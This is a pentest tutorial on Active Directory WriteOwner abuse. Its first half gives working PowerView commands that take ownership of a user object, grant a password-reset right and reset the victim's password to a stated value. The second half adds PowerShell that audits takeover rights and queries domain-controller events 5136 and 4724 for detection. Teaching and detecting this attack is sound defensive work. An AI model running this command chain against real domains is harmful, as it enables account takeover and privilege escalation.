# WriteOwner Exploit

## What is the WriteOwner Permission For?

Active Directory objects such as users and groups are securable objects: the DACL and its ACEs define who can read or modify them (e.g. change the account name, reset the password). The `WriteOwner` permission can be abused by an attacker to change the object's owner to an attacker-controlled user; since the owner can always edit the object's DACL, this is enough to take over the object.

## Scenario:

You have managed to compromise an account belonging to Tom. Running BloodHound showed that there was no direct access from Tom's account to Domain Admins. Checking **Outbound Object Control** revealed an attack path from Tom to the **Backup Admin** group through Claire.

![Outband Control Option](/files/-MQDP-k8e4ZU3P5mcAq5)

![Attack Path Identified](/files/-MQDP5cmEv2AbdZsvO7z)

#### Attack Path

1. Tom has `WriteOwner` permissions over Claire
2. Claire has `GenericWrite` permissions over the group `BACKUP_ADMINS`
3. `BACKUP_ADMINS` sounds interesting :)

In order to easily take advantage of the `WriteOwner` and `GenericWrite` permissions, we'll use `PowerView`, which is part of the [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git) collection.

```powershell
# Step 1 (WriteOwner abuse): make tom the owner of claire's user object
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom

# Step 2: as the owner, tom can edit claire's DACL; grant himself the
# extended right to reset her password
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

# Step 3: build a PowerShell credential and change the password.
# NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROSTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT
# (single quotes so the "$" in the password is not interpolated)
$cred = ConvertTo-SecureString 'qwer1234QWER!@#$' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $cred
```

![Screenshot for reference](/files/-MQDPJ19BsoNaV7xeZWa)

Success. You can now log in as Claire using the new password: **qwer1234QWER!@#$**

![](/files/-MQDPR_2VHlfytI5vBWx)
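From the defender's side, the same path is easy to find before BloodHound does, and every step of it leaves a trace on the domain controller. The following is an added example and is not part of the original page or of PowerView: it uses only the RSAT `ActiveDirectory` module and `Get-WinEvent`. It assumes the DC has the "Audit Directory Service Changes" and "Audit User Account Management" subcategories enabled (otherwise events 5136 and 4724 are never written), and the `$ExpectedPrincipals` list is a placeholder you extend with your own tier-0 groups.

```powershell
# Added defensive example (not from the original page): audit who holds
# object-takeover rights over AD objects and list the events that the
# WriteOwner -> DACL edit -> password reset chain above leaves behind.
Import-Module ActiveDirectory

# Rights that let a principal take control of an object's ACL. GenericWrite is
# included because it is the second hop in the scenario (Claire -> BACKUP_ADMINS).
$DangerousRights = @('WriteOwner', 'WriteDacl', 'GenericAll', 'GenericWrite')

# Principals expected to control everything; anything else is flagged.
# Placeholder list: extend with your own tier-0 groups.
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    "$env:USERDOMAIN\Domain Admins",
    "$env:USERDOMAIN\Enterprise Admins"
)

function Find-ObjectTakeoverRights {
    param(
        # sAMAccountName or distinguishedName of the objects to audit,
        # e.g. 'claire' and 'BACKUP_ADMINS' from the scenario.
        [Parameter(Mandatory)] [string[]] $Identity
    )
    foreach ($id in $Identity) {
        $obj = Get-ADObject -Filter "sAMAccountName -eq '$id' -or distinguishedName -eq '$id'" `
                            -Properties nTSecurityDescriptor
        if (-not $obj) { Write-Warning "Object '$id' not found"; continue }
        $acl = $obj.nTSecurityDescriptor   # System.DirectoryServices.ActiveDirectorySecurity

        # Report the owner first: an unexpected owner means WriteOwner was already used.
        $owner = $acl.Owner.ToString()
        [pscustomobject]@{
            Object = $obj.Name; Principal = $owner; Rights = 'OWNER'
            Unexpected = ($owner -notin $ExpectedPrincipals)
        }

        # Then every Allow ACE that carries a takeover right.
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $granted = $ace.ActiveDirectoryRights.ToString()   # e.g. "WriteOwner, WriteDacl"
            $hits = $DangerousRights | Where-Object { $granted -match $_ }
            if (-not $hits) { continue }
            $who = $ace.IdentityReference.ToString()
            [pscustomobject]@{
                Object = $obj.Name; Principal = $who; Rights = ($hits -join ',')
                Unexpected = ($who -notin $ExpectedPrincipals)
            }
        }
    }
}

function Get-AclAbuseEvents {
    param(
        # DC to query; defaults to the logon server of the current session.
        [string] $DomainController = $env:LOGONSERVER.TrimStart('\'),
        [int]    $Hours = 24
    )
    $since = (Get-Date).AddHours(-$Hours)
    # 5136: directory service object modified. Owner and DACL changes (steps 1
    #       and 2 above) appear as a modification of attribute nTSecurityDescriptor.
    # 4724: an attempt was made to reset an account's password (step 3 above).
    Get-WinEvent -ComputerName $DomainController -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Security'; Id = 5136, 4724; StartTime = $since
    } |
    Where-Object { $_.Id -eq 4724 -or $_.Message -match 'nTSecurityDescriptor' } |
    Select-Object TimeCreated, Id,
        @{ n = 'Summary'; e = { ($_.Message -split "`n")[0].Trim() } }
}

# Usage: flag the two objects from the scenario, then pull the last two days of events.
Find-ObjectTakeoverRights -Identity 'claire', 'BACKUP_ADMINS' |
    Where-Object Unexpected | Format-Table -AutoSize
Get-AclAbuseEvents -Hours 48 | Format-Table -AutoSize
```

Run against the scenario, the first call would report `tom` with `WriteOwner` over `claire` and `claire` with `GenericWrite` over `BACKUP_ADMINS` as unexpected; after the attack it would additionally show `tom` as owner of `claire` with a `ResetPassword`-style extended right. Remediation is the mirror image of the attack: remove the offending ACE and restore the owner (for example via `Set-Acl` on the `AD:` drive), then treat the reset password as compromised. The event query only finds anything if the audit subcategories named above are enabled, so check that first rather than assuming a quiet log means a quiet domain.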
